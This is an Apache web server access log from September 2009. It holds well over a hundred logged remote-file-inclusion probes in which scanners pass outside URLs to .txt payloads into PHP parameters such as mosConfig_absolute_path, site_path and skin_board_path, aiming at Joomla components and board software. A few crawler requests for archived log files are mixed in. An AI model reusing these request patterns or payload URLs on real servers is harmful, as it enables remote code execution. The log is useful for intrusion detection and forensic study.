70.90.108.169 - - [11/Sep/2009:09:26:56 -0500] "GET /logs/errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:09:26:56 -0500] "GET /logs/access_log.1243555200/errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:09:27:57 -0500] "GET /logs/access_log.1233014400/errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.11.145.8 - - [11/Sep/2009:09:28:29 -0500] "GET /?skin_board_path=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
72.11.145.8 - - [11/Sep/2009:09:28:55 -0500] "GET /logs/?skin_board_path=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 200 204578 "-""libwww-perl/5.805"
211.110.11.75 - - [11/Sep/2009:09:32:06 -0500] "GET /?commonpath=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:09:32:07 -0500] "GET /logs/access_log.1243728000/?commonpath=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:09:32:12 -0500] "GET /logs/access_log.1246406400/?commonpath=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:09:32:41 -0500] "GET /logs/?commonpath=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt??? HTTP/1.1" 200 98159 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:33:57 -0500] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:33:57 -0500] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:33:57 -0500] "GET /logs/access_log.1247270400///skin/ggambo7002_board/comment_modify.php?dir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:34:07 -0500] "GET /logs/access_log.1247616000///skin/ggambo7002_board/comment_modify.php?dir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
222.73.17.7 - - [11/Sep/2009:09:35:08 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.73.17.7 - - [11/Sep/2009:09:35:08 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.73.17.7 - - [11/Sep/2009:09:35:08 -0500] "GET /logs/access_log.1250985600//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:35:09 -0500] "GET /errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:35:09 -0500] "GET /logs/errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:35:09 -0500] "GET /logs/access_log.1243555200/errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.73.17.7 - - [11/Sep/2009:09:35:13 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.73.17.7 - - [11/Sep/2009:09:35:13 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.73.17.7 - - [11/Sep/2009:09:35:13 -0500] "GET /logs/access_log.1250985600//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.73.17.7 - - [11/Sep/2009:09:35:17 -0500] "GET /logs/access_log.1244246400//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:09:35:22 -0500] "GET //include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:09:35:22 -0500] "GET /logs//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:09:35:22 -0500] "GET /logs/access_log.1236297600//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:09:35:22 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:35:43 -0500] "GET /logs/access_log.1233014400/errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.73.17.7 - - [11/Sep/2009:09:35:47 -0500] "GET /logs/access_log.1244246400//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.230.165 - - [11/Sep/2009:09:36:37 -0500] "GET /logs/access_log.1243036800 HTTP/1.1" 200 1047275 "-""Mozilla/4.0"
82.151.132.176 - - [11/Sep/2009:09:37:29 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://licitalok.com/includes/popups/one.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:09:37:29 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://licitalok.com/includes/popups/one.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:09:37:29 -0500] "GET /logs/access_log.1244764800/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://licitalok.com/includes/popups/one.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
174.37.136.126 - - [11/Sep/2009:09:37:33 -0500] "GET /logs/errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
174.37.136.126 - - [11/Sep/2009:09:37:33 -0500] "GET /logs/access_log.1243555200/errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
174.37.136.126 - - [11/Sep/2009:09:37:33 -0500] "GET /errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:09:37:35 -0500] "GET //guestbook1//admin.php?include_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:09:37:35 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:09:37:35 -0500] "GET /logs/access_log.1244764800//guestbook1//admin.php?include_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
174.37.136.126 - - [11/Sep/2009:09:37:42 -0500] "GET /logs/access_log.1233014400/errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.230.165 - - [11/Sep/2009:09:37:49 -0500] "GET /logs/access_log.1245110400 HTTP/1.1" 200 649337 "-""Mozilla/4.0"
218.38.136.251 - - [11/Sep/2009:09:37:54 -0500] "GET /logs//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:09:37:54 -0500] "GET //include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:09:37:57 -0500] "GET //include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:09:37:57 -0500] "GET /logs/access_log.1236297600//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:09:37:57 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:09:37:57 -0500] "GET /logs//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:09:38:00 -0500] "GET /logs/access_log.1236297600//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:09:38:00 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:09:38:00 -0500] "GET //include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:09:38:00 -0500] "GET /logs//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:09:38:00 -0500] "GET /logs/access_log.1236297600//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:09:38:00 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:09:38:01 -0500] "GET //guestbook1//admin.php?include_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:09:38:01 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:09:38:01 -0500] "GET /logs/access_log.1244764800//guestbook1//admin.php?include_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:09:38:07 -0500] "GET //include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:09:38:07 -0500] "GET /logs//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:09:38:07 -0500] "GET /logs/access_log.1236297600//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:09:38:07 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:09:38:13 -0500] "GET /logs//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:09:38:13 -0500] "GET //include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:09:38:13 -0500] "GET /logs/access_log.1236297600//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
222.236.47.23 - - [11/Sep/2009:09:38:13 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
213.186.117.226 - - [11/Sep/2009:09:38:24 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
213.186.117.226 - - [11/Sep/2009:09:38:24 -0500] "GET //include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
213.186.117.226 - - [11/Sep/2009:09:38:24 -0500] "GET /logs/access_log.1236297600//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
213.186.117.226 - - [11/Sep/2009:09:38:24 -0500] "GET /logs//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:09:38:31 -0500] "GET /logs/access_log.1236297600//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:09:38:31 -0500] "GET //include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:09:38:31 -0500] "GET /logs//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:09:38:31 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:38:52 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:38:52 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:38:52 -0500] "GET /logs/access_log.1239321600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:39:00 -0500] "GET /logs/access_log.1241395200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:39:46 -0500] "GET //include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:39:46 -0500] "GET /logs//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:39:46 -0500] "GET /logs/access_log.1236297600//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:39:46 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:39:50 -0500] "GET //include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:39:50 -0500] "GET /logs//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:39:50 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:09:39:50 -0500] "GET /logs/access_log.1236297600//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
65.55.230.164 - - [11/Sep/2009:09:40:00 -0500] "GET /logs/access_log.1190592000 HTTP/1.1" 200 4022 "-""Mozilla/4.0"
213.186.117.226 - - [11/Sep/2009:09:40:14 -0500] "GET //include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
213.186.117.226 - - [11/Sep/2009:09:40:14 -0500] "GET /logs/access_log.1236297600//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
213.186.117.226 - - [11/Sep/2009:09:40:14 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
213.186.117.226 - - [11/Sep/2009:09:40:14 -0500] "GET /logs//include/lib.inc.php?site_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:09:40:44 -0500] "GET //include/lib.inc.php?site_path=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:09:40:44 -0500] "GET /logs//include/lib.inc.php?site_path=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:09:40:44 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:09:40:44 -0500] "GET /logs/access_log.1236297600//include/lib.inc.php?site_path=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:09:40:51 -0500] "GET //include/lib.inc.php?site_path=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:09:40:51 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:09:40:51 -0500] "GET /logs//include/lib.inc.php?site_path=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:09:40:52 -0500] "GET /logs/access_log.1236297600//include/lib.inc.php?site_path=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
124.158.127.241 - - [11/Sep/2009:09:41:25 -0500] "GET /?skin_board_path=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
124.158.127.241 - - [11/Sep/2009:09:41:33 -0500] "GET /logs/?skin_board_path=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 200 204578 "-""libwww-perl/5.79"
82.151.132.176 - - [11/Sep/2009:09:42:37 -0500] "GET /logs/access_log.1244592000/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://licitalok.com/includes/popups/one.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
65.55.230.164 - - [11/Sep/2009:09:42:41 -0500] "GET /logs/access_log.1226275200 HTTP/1.1" 200 177702 "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:09:42:42 -0500] "GET /logs/access_log.1161734400 HTTP/1.1" 200 1128 "-""Mozilla/4.0"
82.151.132.176 - - [11/Sep/2009:09:42:44 -0500] "GET /logs/access_log.1249084800/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://licitalok.com/includes/popups/one.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
65.55.230.164 - - [11/Sep/2009:09:42:45 -0500] "GET /logs/access_log.1157932800 HTTP/1.1" 200 7836 "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:09:42:47 -0500] "GET /logs/access_log.1129161600 HTTP/1.1" 200 1001 "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:09:42:47 -0500] "GET /logs/access_log.1188691200 HTTP/1.1" 200 1960 "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:09:42:47 -0500] "GET /logs/access_log.1178755200 HTTP/1.1" 200 968 "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:09:42:48 -0500] "GET /logs/access_log.1205366400 HTTP/1.1" 200 2649 "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:09:42:48 -0500] "GET /logs/access_log.1186790400 HTTP/1.1" 200 1671 "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:09:42:49 -0500] "GET /logs/access_log.1212105600 HTTP/1.1" 200 1347 "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:09:42:49 -0500] "GET /logs/access_log.1147046400 HTTP/1.1" 200 2152 "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:09:42:52 -0500] "GET /logs/access_log.1125792000 HTTP/1.1" 200 423 "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:09:43:00 -0500] "GET /logs/access_log.1196121600 HTTP/1.1" 200 2115 "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:09:43:00 -0500] "GET /logs/access_log.1174089600 HTTP/1.1" 200 3637 "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:09:43:01 -0500] "GET /logs/access_log.1236988800 HTTP/1.1" 200 251443 "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:09:43:01 -0500] "GET /logs/access_log.1153699200 HTTP/1.1" 200 296 "-""Mozilla/4.0"
94.136.37.141 - - [11/Sep/2009:09:44:47 -0500] "GET /?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
94.136.37.141 - - [11/Sep/2009:09:44:50 -0500] "GET /logs/?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 200 204578 "-""libwww-perl/5.803"
70.90.108.169 - - [11/Sep/2009:09:47:24 -0500] "GET /errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:09:47:24 -0500] "GET /logs/errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:09:47:28 -0500] "GET /logs/access_log.1237075200/errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:09:47:29 -0500] "GET /logs/access_log.1236211200/errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:09:47:31 -0500] "GET /errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:09:47:31 -0500] "GET /logs/errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:09:47:31 -0500] "GET /logs/access_log.1237075200/errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
174.37.136.126 - - [11/Sep/2009:09:47:33 -0500] "GET /errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
174.37.136.126 - - [11/Sep/2009:09:47:33 -0500] "GET /logs/access_log.1237075200/errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
174.37.136.126 - - [11/Sep/2009:09:47:33 -0500] "GET /logs/errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
174.37.136.126 - - [11/Sep/2009:09:47:33 -0500] "GET /logs/access_log.1236038400/errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:09:47:36 -0500] "GET /logs/access_log.1236211200/errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.136.37.141 - - [11/Sep/2009:09:47:39 -0500] "GET /logs/access_log.1244764800/?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
94.136.37.141 - - [11/Sep/2009:09:47:39 -0500] "GET /?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
94.136.37.141 - - [11/Sep/2009:09:47:49 -0500] "GET /logs/?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 204578 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
94.136.37.141 - - [11/Sep/2009:09:48:38 -0500] "GET /logs/access_log.1244764800/?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.136.37.141 - - [11/Sep/2009:09:48:38 -0500] "GET /?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.136.37.141 - - [11/Sep/2009:09:48:52 -0500] "GET /logs/?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 176021 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
65.55.106.113 - - [11/Sep/2009:09:49:08 -0500] "GET /logs/access_log.1191801600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
